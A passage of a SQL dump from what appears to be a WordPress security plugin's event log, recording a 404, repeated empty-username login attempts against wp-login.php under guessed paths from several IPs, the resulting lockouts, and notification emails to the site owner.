14:50:29',19426304,20623856,'https://bintara.com.my/blog/wp-login.php',1,0,'167.99.168.27'),(26396,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_ORIGIN\";s:18:\"http://bintara.net\";s:12:\"HTTP_REFERER\";s:30:\"http://bintara.net/?page_id=18\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/B08C390C\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"57762\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:22:\"http://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4u3kXpgmG5P@iB8lCnAAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077435.9199\";s:12:\"REQUEST_TIME\";s:10:\"1569077435\";}}','notice','2019-09-21 14:50:37','2019-09-21 14:50:36',19402320,20924288,'http://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(26397,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY4v7fBTP0kPOVnb8jynwAAAFQ\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"46.101.168.151\";s:11:\"REMOTE_PORT\";s:5:\"49566\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4v7fBTP0kPOVnb8jynwAAAFQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077439.3045\";s:12:\"REQUEST_TIME\";s:10:\"1569077439\";}}','notice','2019-09-21 14:50:40','2019-09-21 14:50:39',19135328,20625504,'https://bintara.com.my/test/wp-login.php',1,0,'46.101.168.151'),(26398,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:50:39\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:50:39\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:50:39\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:50:39\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:50:40','2019-09-21 14:50:39',19220760,20625504,'https://bintara.com.my/test/wp-login.php',1,0,'46.101.168.151'),(26399,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:50:40','2019-09-21 14:50:39',19428712,20625504,'https://bintara.com.my/test/wp-login.php',1,0,'46.101.168.151'),(26400,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY4wnkXpgmG5P@iB8lCoAAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"167.114.118.135\";s:11:\"REMOTE_PORT\";s:5:\"48582\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4wnkXpgmG5P@iB8lCoAAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077442.0948\";s:12:\"REQUEST_TIME\";s:10:\"1569077442\";}}','notice','2019-09-21 14:50:43','2019-09-21 14:50:42',19134112,20623936,'https://bintara.com.my/2019/wp-login.php',1,0,'167.114.118.135'),(26401,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:50:42\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:50:42\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:50:42\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:50:42\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:50:43','2019-09-21 14:50:42',19218864,20623936,'https://bintara.com.my/2019/wp-login.php',1,0,'167.114.118.135'),(26402,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:50:43','2019-09-21 14:50:42',19425704,20623936,'https://bintara.com.my/2019/wp-login.php',1,0,'167.114.118.135'),(26403,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY4xzDrcQxTmGrCWuaV-QAAAc0\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"176.9.74.214\";s:11:\"REMOTE_PORT\";s:5:\"47404\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4xzDrcQxTmGrCWuaV-QAAAc0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077447.3589\";s:12:\"REQUEST_TIME\";s:10:\"1569077447\";}}','notice','2019-09-21 14:50:48','2019-09-21 14:50:47',19133136,20623984,'https://bintara.com.my/blog/wp-login.php',1,0,'176.9.74.214'),(26404,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:50:47\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:50:47\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:50:47\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:50:47\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:50:48','2019-09-21 14:50:47',19218008,20623984,'https://bintara.com.my/blog/wp-login.php',1,0,'176.9.74.214'),(26405,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:50:48','2019-09-21 14:50:47',19426344,20623984,'https://bintara.com.my/blog/wp-login.php',1,0,'176.9.74.214'),(26406,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY4zDDrcQxTmGrCWuaV-gAAAdU\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"174.138.0.164\";s:11:\"REMOTE_PORT\";s:5:\"60400\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4zDDrcQxTmGrCWuaV-gAAAdU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077452.4974\";s:12:\"REQUEST_TIME\";s:10:\"1569077452\";}}','notice','2019-09-21 14:50:53','2019-09-21 14:50:52',19132024,20622928,'https://bintara.com.my/wordpress/wp-login.php',1,0,'174.138.0.164'),(26407,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:50:52\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:50:52\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:50:52\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:50:52\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:50:53','2019-09-21 14:50:52',19217104,20622928,'https://bintara.com.my/wordpress/wp-login.php',1,0,'174.138.0.164'),(26408,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:50:53','2019-09-21 14:50:52',19425056,20622928,'https://bintara.com.my/wordpress/wp-login.php',1,0,'174.138.0.164'),(26409,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY47nkXpgmG5P@iB8lCwwAAAIM\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"166.62.122.244\";s:11:\"REMOTE_PORT\";s:5:\"44712\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY47nkXpgmG5P@iB8lCwwAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1569077487.06\";s:12:\"REQUEST_TIME\";s:10:\"1569077487\";}}','notice','2019-09-21 14:51:28','2019-09-21 14:51:27',19137848,20627552,'https://bintara.com.my/wp/wp-login.php',1,0,'166.62.122.244'),(26410,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:51:27\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:51:27\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:51:27\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:51:27\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:51:28','2019-09-21 14:51:27',19223520,20627552,'https://bintara.com.my/wp/wp-login.php',1,0,'166.62.122.244'),(26411,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:51:28','2019-09-21 14:51:27',19430912,20627552,'https://bintara.com.my/wp/wp-login.php',1,0,'166.62.122.244'),(26412,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 